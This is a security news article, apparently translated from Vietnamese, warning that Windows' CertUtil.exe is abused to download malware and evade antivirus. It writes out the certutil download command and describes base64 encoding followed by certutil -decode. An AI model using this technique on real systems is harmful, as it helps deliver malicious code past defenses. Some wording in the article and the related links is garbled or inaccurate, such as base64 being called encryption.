Home
Tech info
Technology
Science
Life
Application
Electric
Program
Mobile
Windows 10
Windows 11CertUtil.exe allows an attacker to download malicious code and bypass antivirus software
Windows has an integrated software called CertUtil for managing certificates in Windows. Using CertUtil you can install, backup, delete, manage, perform certification-related functions in Windows.
One of CertUtil's features is to download the certificate or any related file from the URL and save it on the computer using certutil.exe -urlcache -split -f [URL] output.file .
In 2017, security researcher Casey Smith warned of using this method to download malicious code. In 2016 it was taken advantage of and last March there was a Trojan that used it to download a series of files and scripts to the computer.
The attacker still uses CertUtil because some computers are still locked, not allowing strange software to download files. Using Windows built-in software will help to be whitelisted and allowed to download files.
CertUtil is used on a recent trojan
Use CertUtil + Base64 to bypass antivirus software
Security consultant Xaview Mertens recently released a new way to use CertUtil, whereby base64 will first encrypt the malicious file to be identified as harmless, then decrypt it after being downloaded by CertUtil.exe.
Command to download files with CertUtil:
certutil.exe -urlcache -split -f [URL] output.file
MalwareHunterTeam indicates that certutil.exe -decode has been used in practice. F5 Labs also details a campaign using CertUtil.exe to install a virtual money digging tool. Fabio Assolini from Kaspersky also warned that this method was used in Brazil.
Every day there are always new tricks to exploit the programs that are legal, secure on Windows. If you do not use CertUtil to access the certificate or remote server, you should lock the network connectivity of this tool.
See more:
- Warning of new malware appear like Wannacry, capable of deleting Vietnamese percussion on computer
- What to do when the computer is infected with a virus that fights virtual money?
- Plugins on well-known editing tools can give hackers priority
Micah SotoYou should read it
- What to do when the computer is infected with a virus that fights virtual money?
- VNCERT issued an emergency alert warning malicious code exploiting Coinhive virtual money
- Warning: a new variant of the virus that fills virtual money via Facebook Messenger will appear every 10 minutes
- Warning: A new code of virtual money training is spreading strongly in Vietnam
- After WannaCry, Petya's 'extortion' malicious code is raging, this is a remedy to prevent
- Warning: New variants of malicious code digging on Facebook threaten users in Vietnam
- Discover a new kind of malicious code that can record the phone call to extort money
- The malware owner earned $ 63,000 from digging Monero on the IIS server
May be interested
- Dirty SEO campaign brings a series of malicious software to the top of search
cybercriminals are using dirty seo methods to bring malicious software to the top of search. - Website Lenovo distributed malicious codehackers have attacked vebsite to support downloading drivers from leading chinese computer manufacturers, lenovo and inserting malicious code into the website.
- Kaspersky gave the antivirus software source code to a third party for reviewthe russian antivirus company offers a 'comprehensive transparency initiative', allowing independent third parties to evaluate their source code and internal processes to win users' trust.
- 9 best antivirus software for Macby now, you know that mac needs antivirus software, but which antivirus software should you choose? there are a lot of security applications dedicated to mac and it can be difficult to distinguish them, so we did a study. 9 security suites will help your computer not be infected with viruses, trojans and all other types of malware.
- Hackers fake Windows 11 download page to spread malicious codehackers are luring naive users into downloading fake windows 11 containing malicious code that steals browser data and cryptocurrency wallets.
- TOP 5 best free antivirus software in 2022, effective and convenientwhat is a computer virus? some basics about computer viruses and which antivirus software to download? let's find out the top 5 best free antivirus software in 2022.
- Warning: New malicious code is infecting about 500,000 router devicescisco researchers have released a warning warning about a malicious malicious code called vpnfilter, which is spread by a group of hackers spreading more than 500,000 home or small companies' devices across the globe. world.
- 14 games on the App Store contain malicious code, iPhone users be carefulsecurity researchers wandera recently discovered 14 games linked to a server once used to control malware golduck that made the android world chaotic last year.
- 5 things to consider before buying antivirus softwarewith dozens of anti-virus software on the market, you will wonder which one to choose. please refer to our article before making your decision!
- New weapons against malicious code are 'cloud' computing.the 'cloud computing' model of remote server-based data processing and results returned to the pc will incorporate 10 antivirus engines and two hackers to detect hackers to prevent the malicious code.
Attack the network
- Warning: GandCrab extortionist code is attacking Vietnam
- Appearing dangerous Android malicious code specializing in stealing chat content on Facebook Messenger, Skype ...
- Warning: Detecting more than 1000 Cisco router and switch devices in Vietnam has a serious security error
- A series of cult videos, billions of views on YouTube were hacked, renamed and deleted
- Ransomware appears to require users to play PUBG for 1 hour instead of ransom
- Warning of donkey by accepting money on Facebook
Warning: GandCrab extortionist code is attacking Vietnam
Appearing dangerous Android malicious code specializing in stealing chat content on Facebook Messenger, Skype ...
Warning: Detecting more than 1000 Cisco router and switch devices in Vietnam has a serious security error
A series of cult videos, billions of views on YouTube were hacked, renamed and deleted
Ransomware appears to require users to play PUBG for 1 hour instead of ransom
Warning of donkey by accepting money on Facebook